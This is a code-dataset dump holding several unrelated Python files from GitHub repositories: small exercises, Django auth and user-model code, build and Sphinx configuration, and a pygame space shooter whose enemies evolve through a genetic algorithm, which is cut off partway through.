blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8212462617b51d5afbf32fbe0aa6e02ac157b1de | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_155/760.py | c9ed44a45ad2596edbd1cbaff02c0ff2ac596d1c | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,137 | py | def opera(case_list):
sat = []
for e in case_list:
sat.append(int(e))
t = sum(sat)
standing = sat[0]
invites = 0
s_list = []
count = 0
for i in sat:
if i > 0:
s_list.append(count)
count += 1
if s_list[0] == 0:
s_list = s_list[1:]
while standing < t:
for i in s_list:
if standing >= i:
standing += sat[i]
else:
while standing < i:
standing += 1
invites += 1
standing += sat[i]
return invites
input_file = open('C:\Users\chrisjwaite\Desktop\\A-large.in')
output_file = open('C:\Users\chrisjwaite\Desktop\\A-large_output.out', 'w')
lines = input_file.read().split('\n')
n_cases = int(lines[0])
case_list = []
for case in lines[1:-1]:
data = case.split(' ')
case_list.append(data[1])
for i in range(n_cases):
output_file.write('Case #' + str(i+1) + ': ' + str(opera(case_list[i])) + '\n')
input_file.close()
output_file.close()
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
dc4154411cebb62610fc115629ae97554429cfad | 4e52ac2399187040720003a3381d30102f376b36 | /users/tests.py | 5ab660b8493b6d104fdf1727d3a22dabd8046a9b | [] | no_license | drobchak1/starnavitest | 5908758c1f7e35dc65e4af617eced68111a5ef61 | 1779655e2a24dee1242a60a8d3c42e1346f2b325 | refs/heads/main | 2023-05-30T05:47:51.992585 | 2021-06-14T09:16:52 | 2021-06-14T09:16:52 | 375,025,450 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,654 | py | from django.urls import reverse
from rest_framework import status
from rest_framework.test import APITestCase, APIClient
from .models import User
class AuthTests(APITestCase):
def test_api_jwt(self):
"""
Ensure we can register user and create post using JWT-token.
"""
url = reverse('token_obtain_pair')
u = User.objects.create_user(username='user', email='user@foo.com', password='pass')
u.is_active = False
u.save()
resp = self.client.post(url, {'email':'user@foo.com', 'password':'pass'}, format='json')
self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST)
u.is_active = True
u.save()
resp = self.client.post(url, {'username':'user', 'password':'pass'}, format='json')
self.assertEqual(resp.status_code, status.HTTP_200_OK)
print(resp.data)
self.assertTrue('access' in resp.data)
self.assertTrue('refresh' in resp.data)
token = resp.data['access']
verification_url = reverse('api:post-list')
client = APIClient()
client.credentials(HTTP_AUTHORIZATION='Bearer ' + 'abc')
resp = client.post(verification_url, {
"title": "new post2",
"description": "kjflkgjdlfkjgklfjdgjd"
})
self.assertEqual(resp.status_code, status.HTTP_401_UNAUTHORIZED)
client.credentials(HTTP_AUTHORIZATION='Bearer ' + token)
resp = client.post(verification_url, {
"title": "new post2",
"description": "kjflkgjdlfkjgklfjdgjd"
})
self.assertEqual(resp.status_code, status.HTTP_201_CREATED) | [
"drobchak.iv@gmail.com"
] | drobchak.iv@gmail.com |
679abec5a4e844e55bb688b91516ae2c3e017cd0 | 843cd7e662071d1aeb0acb1c9024bce1cbc49415 | /LTP1-2020-2/PRATICA03/programa01.py | 76c526ba186f4b6d5165a0d96146500dad983b0b | [] | no_license | diego-mr/FATEC-MECATRONICA-0791821037-DIEGO | c1b7c78a1a58c907ec491d72826dc1a2f73f65c5 | e3b5006e6b31739bbdad75c3a617f8fdbb549dbc | refs/heads/master | 2023-01-14T05:05:21.658363 | 2020-11-24T12:22:32 | 2020-11-24T12:22:32 | 292,006,525 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 96 | py | # Isso é um comentário em python
# A função print escreve coisas na tela
print('ola Mundo')
| [
"noreply@github.com"
] | diego-mr.noreply@github.com |
ce721d4ba20589c27e7803b042e5ba246649e551 | 0d06d5768d3b91719078043ff8b8b01758b4618d | /bsp/rockchip/rv1108/SConscript | 0a22d7ca51baee247397c00b13ccb9a2a16b03fe | [
"Apache-2.0",
"LicenseRef-scancode-generic-cla"
] | permissive | h-hys/new_rk2108 | de71255c205cf13d8d9069e7bde84a30ddb06cbc | a899e5e4512e5fc7dbb70cdea19257291e9ff042 | refs/heads/master | 2023-02-09T09:34:35.995623 | 2021-01-06T08:07:42 | 2021-01-06T08:07:42 | 327,238,676 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,012 | # for module compiling
import os
Import('RTT_ROOT')
cwd = str(Dir('#'))
objs = []
list = os.listdir(cwd)
objs = SConscript(os.path.join(cwd, 'HalSConscript'), variant_dir = '.', duplicate=0)
for d in list:
path = os.path.join(cwd, d)
if os.path.isfile(os.path.join(path, 'SConscript')):
objs = objs + SConscript(os.path.join(d, 'SConscript'))
objs = objs + SConscript(os.path.join(RTT_ROOT, 'bsp/rockchip/common/drivers/SConscript'), variant_dir = 'common/drivers', duplicate=0)
objs = objs + SConscript(os.path.join(RTT_ROOT, 'applications/SConscript'), variant_dir = 'applications', duplicate=0)
objs = objs + SConscript(os.path.join(RTT_ROOT, 'bsp/rockchip/common/tests/SConscript'), variant_dir = 'common/tests', duplicate=0)
objs = objs + SConscript(os.path.join(RTT_ROOT, 'examples/kernel/SConscript'), variant_dir = 'examples/kernel', duplicate=0)
objs = objs + SConscript(os.path.join(RTT_ROOT, 'examples/file/SConscript'), variant_dir = 'examples/file', duplicate=0)
Return('objs')
| [
"374122506@qq.com"
] | 374122506@qq.com | |
06fd2a02b8abf201b60c6ad2a418b5f86b9a642d | 697cdbb683ee7a1aff5092f2afa9a462dd26874f | /main.py | fab78b64d8cabf3ed0cf3bdec1e8b73cb2e889a8 | [] | no_license | chenyilin0110/DE_Ackley | 68a85c99142d9f1ac5ffa76299363816d9122bd5 | 7a3de80fe663720a717c07b54b6bedd132d47ac3 | refs/heads/master | 2020-04-24T22:16:01.181077 | 2019-03-10T07:54:27 | 2019-03-10T07:54:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,372 | py | import numpy as np
import random as rand
import sys
from Mutation import mutation
from Crossover import crossover
from Selection import selection
from Fitness import fitness
import time
Ud = sys.argv[1]
population = sys.argv[2]
dim = sys.argv[3]
F = sys.argv[4]
CR = sys.argv[5]
iteration = sys.argv[6]
Ld = float(Ud) * (-1)
start = time.time()
# Initial
populationDataOriginal = np.zeros((int(population), int(dim)))
for eachpopulationData_colum in range(int(population)):
for eachpopulationData_row in range(int(dim)):
r = rand.random()
populationDataOriginal[eachpopulationData_colum][eachpopulationData_row] = ((float(Ud) - Ld) * r) + Ld
populationData = populationDataOriginal.copy() # copy populationDataOriginal to populationData
best = 99999
for eachiteration in range(int(iteration)):
# Mutation
mutationData = mutation(populationData, float(F))
# Crossover
crossoverData = crossover(populationDataOriginal, mutationData, float(CR))
# Selection
selectionData = selection(populationDataOriginal, crossoverData, int(dim))
count = []
for i in range(np.size(selectionData, 0)):
count.append(fitness(selectionData[i][:], int(dim)))
if count[i] < best:
best = count[i]
print(eachiteration, best)
# reset
populationDataOriginal = selectionData.copy()
populationData = selectionData.copy()
end = time.time()
print(end-start) | [
"a0989735018@gmail.com"
] | a0989735018@gmail.com |
b3c8fe1b01b4f346e6e37e7e6392529a4e721425 | 70822bf16524420a098dd44e785deadc9b8b0510 | /users/models.py | b12f7813f8d0077079a4c4b00f74d635abfb322b | [] | no_license | Will-Sargeant/Django-Boiler-Plate-Email-UserModel | 28cb1fc21197f706ff66aa23ead308568d1bd8fb | 62c91145e679bee5da37aea14648dfd731870e9b | refs/heads/master | 2021-09-24T18:16:52.049909 | 2019-12-28T01:18:26 | 2019-12-28T01:18:26 | 230,534,912 | 0 | 0 | null | 2021-09-22T18:18:30 | 2019-12-27T23:59:53 | Python | UTF-8 | Python | false | false | 926 | py | from django.db import models
from django.contrib.auth.models import AbstractBaseUser
from django.contrib.auth.models import PermissionsMixin
from django.utils.translation import gettext_lazy as _
import datetime
from .managers import CustomUserManager
class CustomUser(AbstractBaseUser, PermissionsMixin):
id = models.AutoField(primary_key=True)
email = models.EmailField(_('email address'), unique=True)
first_name = models.CharField(max_length=35)
last_name = models.CharField(max_length=50)
is_staff = models.BooleanField(default=False, verbose_name='Admin')
is_active = models.BooleanField(default=True)
date_joined = models.DateTimeField(default=datetime.datetime.today())
last_login = models.DateTimeField(default=datetime.datetime.today())
def __str__(self):
return self.email
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = []
objects = CustomUserManager()
| [
"will@docpostie.com"
] | will@docpostie.com |
b537ff8a73e8ae1e495b410aacca8edcf82d38a9 | 1b8951a5128a1c36fe3aece5a9c1d8dda039f67d | /sum_divisors_3.py | 8453ccde96b3e9a1b79c41ee0a06d82bc7dc689f | [] | no_license | AndrePina/Python-Course-Work | 89cf03209f0d447940685fad899064670bc9dc0c | 49e39496327be0a3a3381040ba39874855cf1c2f | refs/heads/master | 2022-12-08T22:41:24.591888 | 2020-09-12T11:30:27 | 2020-09-12T11:30:27 | 294,930,576 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 743 | py | # Fill in the empty function so that it returns the sum of all the divisors of a number, without including it.
# A divisor is a number that divides into another without a remainder.
def sum_divisors(n):
sum = 0
divisor_1 = 1
x = 1
# Return the sum of all divisors of n, not including n
while x < n :
if n % divisor_1 == 0:
sum = sum + divisor_1
divisor_1 = divisor_1 + 1
x = x + 1
elif n % divisor_1 != 0:
x = x + 1
divisor_1 = divisor_1 + 1
return sum
print(sum_divisors(0)) # 0
print(sum_divisors(3)) # Should sum of 1 # 1
print(sum_divisors(36)) # Should sum of 1+2+3+4+6+9+12+18 # 55
print(sum_divisors(102)) # Should be sum of 2+3+6+17+34+51 *** Missing "1" from answer string # 114
| [
"aapina427@gmail.com"
] | aapina427@gmail.com |
8b9613542d6316a2175fc90b8151e4c82c1b1256 | f9729802d62bc72df4a6e59c3f49d4bd1fc92043 | /docs/conf.py | da4780f8311665e03ef2fa834069cce5e50e6c75 | [
"MIT"
] | permissive | wefner/emaillib | 50a63e7394d3a09dad3f58b6964335ff1ce298cb | 2a00a3c5d4745898b96e858607b43784fa566fac | refs/heads/master | 2021-06-28T17:51:56.269015 | 2017-09-18T17:27:11 | 2017-09-18T17:27:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,411 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# emaillib documentation build configuration file, created by
# sphinx-quickstart on Tue Jul 9 22:26:36 2013.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import sphinx_rtd_theme
# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory is
# relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# Get the project root dir, which is the parent dir of this
cwd = os.getcwd()
project_root = os.path.dirname(cwd)
# Run apidoc to traverse the project directory and add all modules to the docs
import sphinx.apidoc
sphinx.apidoc.main(argv=['_','-f', '-o', os.path.join(project_root, 'docs'),
os.path.join(project_root, '''emaillib''')])
# parse the index.rst and fix the title underlining
with open(os.path.join(os.path.abspath(os.path.dirname(__file__)),
'index.rst'), 'r+') as index_rst_file:
index_rst = index_rst_file.read()
index_rst_file.seek(0, 0)
for line in index_rst.splitlines():
if line.startswith('Welcome to '):
line_length = len(line.strip())
if line.startswith('======================================'):
line = '=' * line_length
index_rst_file.write(line + '\n')
# Insert the project root dir as the first element in the PYTHONPATH.
# This lets us ensure that the source package is imported, and that its
# version is used.
sys.path.insert(0, project_root)
import emaillib
# -- General configuration ---------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.viewcode',
'sphinx.ext.napoleon'
]
napoleon_google_docstring = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'''emaillib'''
copyright = u'''2017, (Author : Costas Tyfoxylos)'''
# The version info for the project you're documenting, acts as replacement
# for |version| and |release|, also used in various other places throughout
# the built documents.
#
# The short X.Y version.
version = emaillib.__version__
# The full version, including alpha/beta/rc tags.
release = emaillib.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to
# some non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built
# documents.
#keep_warnings = False
# -- Options for HTML output -------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a
# theme further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as
# html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the
# top of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon
# of the docs. This file should be a Windows icon file (.ico) being
# 16x16 or 32x32 pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets)
# here, relative to this directory. They are copied after the builtin
# static files, so a file named "default.css" will overwrite the builtin
# "default.css".
#html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names
# to template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer.
# Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer.
# Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages
# will contain a <link> tag referring to it. The value of this option
# must be the base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = '''emaillibdoc'''
# -- Options for LaTeX output ------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index', '''emaillib.tex''',
u'''emaillib Documentation''',
u'''Costas Tyfoxylos''', 'manual'),
]
# The name of an image file (relative to this directory) to place at
# the top of the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings
# are parts, not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', '''emaillib''',
u'''emaillib Documentation''',
[u'''Costas Tyfoxylos'''], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ----------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', '''emaillib''',
u'''emaillib Documentation''',
u'''Costas Tyfoxylos''',
'''emaillib''',
'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| [
"costas.tyf@gmail.com"
] | costas.tyf@gmail.com |
5877b18dbdd8fd46256cb5a59833e6b8f5fa5236 | b7577adc65c91dcf1877dadf07f79e76b4409b54 | /evolving_enemies.py | 8da10ac21ed5ffb878fa3f083f126493b97e2a22 | [
"MIT"
] | permissive | NeonInc/Adaptive-Gameplay | 3fdf134b308f3e084ecf18285a69f8efb9ab39cd | 783797eb0c9e567f1620fb66292ffe6c0a96524a | refs/heads/master | 2020-06-05T15:38:31.262789 | 2019-12-03T12:12:58 | 2019-12-03T12:12:58 | 192,474,989 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 42,846 | py | import random
import pygame
import math
import os
import pygameMenu
from pygameMenu.locals import *
# *****************************************************************************
# Info text for the About Menu
# *****************************************************************************
ABOUT = ['Evolving Enemies:',
'A Game where the Enemies evolve using Genetic Algorithms',
PYGAMEMENU_TEXT_NEWLINE,
'Author: Nipuna Weeratunge',
PYGAMEMENU_TEXT_NEWLINE,
'Email: nipunaw1@gmail.com']
# *****************************************************************************
# Info text for the Help Menu
# *****************************************************************************
HELP = ['Controls:',
'Use Arrow keys to move player ship left/right.',
PYGAMEMENU_TEXT_NEWLINE,
'Press SpaceBar to fire Missile.']
# *****************************************************************************
# Defining the constants and variables
# *****************************************************************************
SCREEN_WIDTH = 1024
SCREEN_HEIGHT = 768
WINDOW_START_POSITION_X = 200
WINDOW_START_POSITION_Y = 0
PLAYER_FIRE_TORPEDO = False
PLAYER_TORPEDO_FIRING_RATE = 5
GENERATE_GAME_OBJECTS = True
MUTATION_RATE_MATRIX = ['0.2']
MUTATION_RATE = 0.2
COLOR_BACKGROUND = (100, 100, 100)
COLOR_BLACK = (0, 0, 0)
COLOR_WHITE = (250, 250, 250)
COLOR_BLUE = (0, 0, 250)
COLOR_RED = (250,0,0)
MENU_BACKGROUND_COLOR = (0, 0, 0)
GAME_DIFFICULTY = ['EASY']
RUN_GAME = True
EPISODE_COUNT = 0
ENEMY_MISSILE_TIMER = 5000
# *****************************************************************************
# The start window position for the game window
# *****************************************************************************
os.environ['SDL_VIDEO_WINDOW_POS'] = "%d,%d" % (WINDOW_START_POSITION_X,WINDOW_START_POSITION_Y)
# *****************************************************************************
# Initialize Pygame and create screen and objects
# *****************************************************************************
pygame.init()
pygame.display.set_caption("Evolving Enemies")
screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))
STAR_FIELD_TIMER = pygame.time.get_ticks()
episode_info_text = pygame.font.Font(pygameMenu.fonts.FONT_FRANCHISE, 30)
# *****************************************************************************
# The initial population for the Genetic Algorithm
# *****************************************************************************
A0 = [0, 0, 0, 0, 0, 0, 0]
A1 = [0, 0, 0, 0, 0, 0, 0]
A2 = [0, 0, 0, 0, 0, 0, 0]
A3 = [0, 0, 0, 0, 0, 0, 0]
A4 = [0, 0, 0, 0, 0, 0, 0]
A5 = [0, 0, 0, 0, 0, 0, 0]
initial_population = [A0,A1,A2,A3,A4,A5]
chromosome_length = len(A0)-1
# *****************************************************************************
# Creates the pygame sprite groups and enemy ship lists
# *****************************************************************************
player_list = pygame.sprite.Group()
all_sprites_list = pygame.sprite.Group()
player_projectile_list = pygame.sprite.Group()
enemy_projectile_list = pygame.sprite.Group()
enemy_list = pygame.sprite.Group()
enemy_shield_list = pygame.sprite.Group()
star_field_list = pygame.sprite.Group()
current_enemy_population = []
enemy_ship_list = []
# *****************************************************************************
# Creates Genetic Algorithm class
# *****************************************************************************
class Genetic_Algorithm():
# Initialize the class
def __init__(self, initial_population,MUTATION_RATE,chromosome_length):
self.initial_population = initial_population
self.MUTATION_RATE = MUTATION_RATE
self.chromosome_length = chromosome_length
print ('Initial population: ' + str(self.initial_population))
# Determine fitness of chromosome by looking at element 6
def current_fitness(self,elem):
return elem[6]
# Sort the chromosomes in the population by descending order of the fitness value
def sort_by_fitness(self,current_population):
current_population.sort(reverse = True,key = self.current_fitness)
return current_population
# Select parents from the sorted population
def selection(self,current_population):
fitness_list = []
for chromosome_index in range(6):
chromosome = current_population[chromosome_index]
# Select parents with fitness less than 20
# This allows chromosomes with lower fitness to be selected as well
if chromosome[6] < 20:
fitness_list.append(chromosome)
if len(fitness_list) > 2:
p1 = fitness_list[0]
p2 = fitness_list[1]
early_stop = False
# If all chromosomes have fitness more than 20,
# select the two parents with the highest fitness value.
# early_stop value can be used to stop the algorithm
else:
p1 = current_population[0]
p2 = current_population[1]
early_stop = True
return p1,p2,early_stop
# Determine the crossover sites for the parents and creates offspring
def crossover(self,p1,p2):
crossover_site = random.randint(1,5)
ch1 = p1[0:crossover_site]+p2[crossover_site:self.chromosome_length]
ch1.append(p1[6])
ch2 = p2[0:crossover_site]+p1[crossover_site:self.chromosome_length]
ch2.append(p2[6])
return ch1,ch2
# Randomly change the values of genes depending on the mutation rate
def mutation(self,chromosome,mutatation_rate):
mutated_gene_list = []
no_of_mutating_genes = math.floor(mutatation_rate*self.chromosome_length)
while True:
if no_of_mutating_genes == 0:
break
# Randomly select a gene from genes 0 to 5 to mutate
random_gene_to_mutate = random.randint(0, 5)
# Check to see if this gene has already been mutated
if mutated_gene_list.count(random_gene_to_mutate) == 0:
# Mutate gene
if chromosome[random_gene_to_mutate] == 0:
chromosome[random_gene_to_mutate] = 1
else:
chromosome[random_gene_to_mutate] = 0
# Decrease genes to mutate counter
no_of_mutating_genes = no_of_mutating_genes-1
# Add the gene to the mutated gene list
mutated_gene_list.append(random_gene_to_mutate)
return chromosome
# Generate a new population with current parameters
def generate_new_population(self):
current_population = self.initial_population
sorted_current_population = self.sort_by_fitness(current_population)
selected_parent_1,selected_parent_2,early_stop = self.selection(sorted_current_population)
generated_child_1,generated_child_2 = self.crossover(selected_parent_1,selected_parent_2)
mutated_child_1 = self.mutation(generated_child_1,self.MUTATION_RATE)
mutated_child_2 = self.mutation(generated_child_2,self.MUTATION_RATE)
current_population[4] = mutated_child_1
current_population[5] = mutated_child_2
sorted_generated_population = self.sort_by_fitness(current_population)
return sorted_generated_population
# *****************************************************************************
# Creates Player class
# *****************************************************************************
class Player(pygame.sprite.Sprite):
# Initialize the class and the sprites
def __init__(self,x,y):
super().__init__()
self.images = []
self.images.append(pygame.image.load('Sprites/Player_Ship/Player_Ship_Idle_1.png'))
self.images.append(pygame.image.load('Sprites/Player_Ship/Player_Ship_Idle_2.png'))
self.images.append(pygame.image.load('Sprites/Player_Ship/Player_Ship_Idle_3.png'))
self.images.append(pygame.image.load('Sprites/Player_Ship/Player_Ship_Idle_4.png'))
self.images.append(pygame.image.load('Sprites/Player_Ship/Player_Ship_Idle_5.png'))
self.images.append(pygame.image.load('Sprites/Player_Ship/Player_Ship_Moving_Left_1.png'))
self.images.append(pygame.image.load('Sprites/Player_Ship/Player_Ship_Moving_Left_2.png'))
self.images.append(pygame.image.load('Sprites/Player_Ship/Player_Ship_Moving_Left_3.png'))
self.images.append(pygame.image.load('Sprites/Player_Ship/Player_Ship_Moving_Left_4.png'))
self.images.append(pygame.image.load('Sprites/Player_Ship/Player_Ship_Moving_Left_5.png'))
self.images.append(pygame.image.load('Sprites/Player_Ship/Player_Ship_Moving_Right_1.png'))
self.images.append(pygame.image.load('Sprites/Player_Ship/Player_Ship_Moving_Right_2.png'))
self.images.append(pygame.image.load('Sprites/Player_Ship/Player_Ship_Moving_Right_3.png'))
self.images.append(pygame.image.load('Sprites/Player_Ship/Player_Ship_Moving_Right_4.png'))
self.images.append(pygame.image.load('Sprites/Player_Ship/Player_Ship_Moving_Right_5.png'))
self.index = 0
self.image = self.images[self.index]
self.rect = pygame.Rect(x,y,self.image.get_rect()[2],self.image.get_rect()[3])
# Update function is called once every frame
def update(self,surface):
# Check left/right arrow key pressed
key = pygame.key.get_pressed()
if key[pygame.K_LEFT]:
# Change index for animation of sprite moving left
self.index += 1
if self.index > 9 or self.index < 5:
self.index = 5
# Move sprite to the left
self.rect.x = self.rect.x - 2
# Stop sprite from moving off screen left
if self.rect.x < 0:
self.rect.x = 0
elif key[pygame.K_RIGHT]:
# Change index for animation of sprite moving right
self.index += 1
if self.index >= len(self.images) or self.index < 10 :
self.index = 10
# Move sprite to the right
self.rect.x = self.rect.x + 2
# Stop sprite from moving off screen right
if self.rect.x > 960:
self.rect.x = 960
else:
# Change index for animation of sprite moving forward
self.index += 1
if self.index > 4:
self.index = 0
# Assign index of sprite
self.image = self.images[self.index]
# *****************************************************************************
# Creates Player Projectile class
# *****************************************************************************
class Player_Projectile(pygame.sprite.Sprite):
# Initialize the class and the sprites
def __init__(self,player_projectile_x,player_projectile_y):
super().__init__()
self.images = []
self.images.append(pygame.image.load('Sprites/Player_Ship/Missile_3_Flying_000.png'))
self.images.append(pygame.image.load('Sprites/Player_Ship/Missile_3_Flying_001.png'))
self.images.append(pygame.image.load('Sprites/Player_Ship/Missile_3_Flying_002.png'))
self.images.append(pygame.image.load('Sprites/Player_Ship/Missile_3_Flying_003.png'))
self.images.append(pygame.image.load('Sprites/Player_Ship/Missile_3_Flying_004.png'))
self.images.append(pygame.image.load('Sprites/Player_Ship/Missile_3_Flying_005.png'))
self.images.append(pygame.image.load('Sprites/Player_Ship/Missile_3_Flying_006.png'))
self.images.append(pygame.image.load('Sprites/Player_Ship/Missile_3_Flying_007.png'))
self.images.append(pygame.image.load('Sprites/Player_Ship/Missile_3_Flying_008.png'))
self.images.append(pygame.image.load('Sprites/Player_Ship/Missile_3_Flying_009.png'))
self.images.append(pygame.image.load('Sprites/Player_Ship/Missile_3_Explosion_000.png'))
self.images.append(pygame.image.load('Sprites/Player_Ship/Missile_3_Explosion_001.png'))
self.images.append(pygame.image.load('Sprites/Player_Ship/Missile_3_Explosion_002.png'))
self.images.append(pygame.image.load('Sprites/Player_Ship/Missile_3_Explosion_003.png'))
self.images.append(pygame.image.load('Sprites/Player_Ship/Missile_3_Explosion_004.png'))
self.images.append(pygame.image.load('Sprites/Player_Ship/Missile_3_Explosion_005.png'))
self.images.append(pygame.image.load('Sprites/Player_Ship/Missile_3_Explosion_006.png'))
self.images.append(pygame.image.load('Sprites/Player_Ship/Missile_3_Explosion_007.png'))
self.images.append(pygame.image.load('Sprites/Player_Ship/Missile_3_Explosion_008.png'))
self.index = 0
self.image = self.images[self.index]
self.rect = pygame.Rect(player_projectile_x,player_projectile_y,self.image.get_rect()[2],self.image.get_rect()[3])
# Update function is called once every frame
def update(self,surface):
# Change index for animation of projectile moving forward
self.index += 1
if self.index > 9:
self.index = 0
# Move sprite forward
self.rect.y = self.rect.y - 2
# Assign index of sprite
self.image = self.images[self.index]
# Called once a player projectile hits enemy
def player_projectile_explosion(self):
# Draws an explosion on the location of collision
self.index = 15
self.image = self.images[self.index]
self.rect.x = self.rect.x - 25
self.rect.y = self.rect.y - 20
player_projectile_list.draw(screen)
pygame.display.update()
# *****************************************************************************
# Creates Enemy Ship class
# *****************************************************************************
class Enemy_Ship(pygame.sprite.Sprite):
# Initialize the class and the sprites
def __init__(self,chromosome,enemy_ship_x,enemy_ship_y,enemy_ship_tag):
super().__init__()
self.images = []
self.move_enemy = False
self.move_left = True
self.enemy_fire_timer = pygame.time.get_ticks()
self.enemy_survive_timer = pygame.time.get_ticks()
self.chaingun_enemy = False
self.bottom_shield = None
self.top_shield = None
self.left_shield = None
self.right_shield = None
self.enemy_ship_tag = enemy_ship_tag
self.chromosome = chromosome
self.fitness_value = self.chromosome[6]
# Give enemy ability to shoot back
if self.chromosome[0] == 1:
self.chaingun_enemy = True
# Give enemy ability to move
if self.chromosome[1] == 1:
self.move_enemy = True
# Give enemy bottom shield
if self.chromosome[2] == 1:
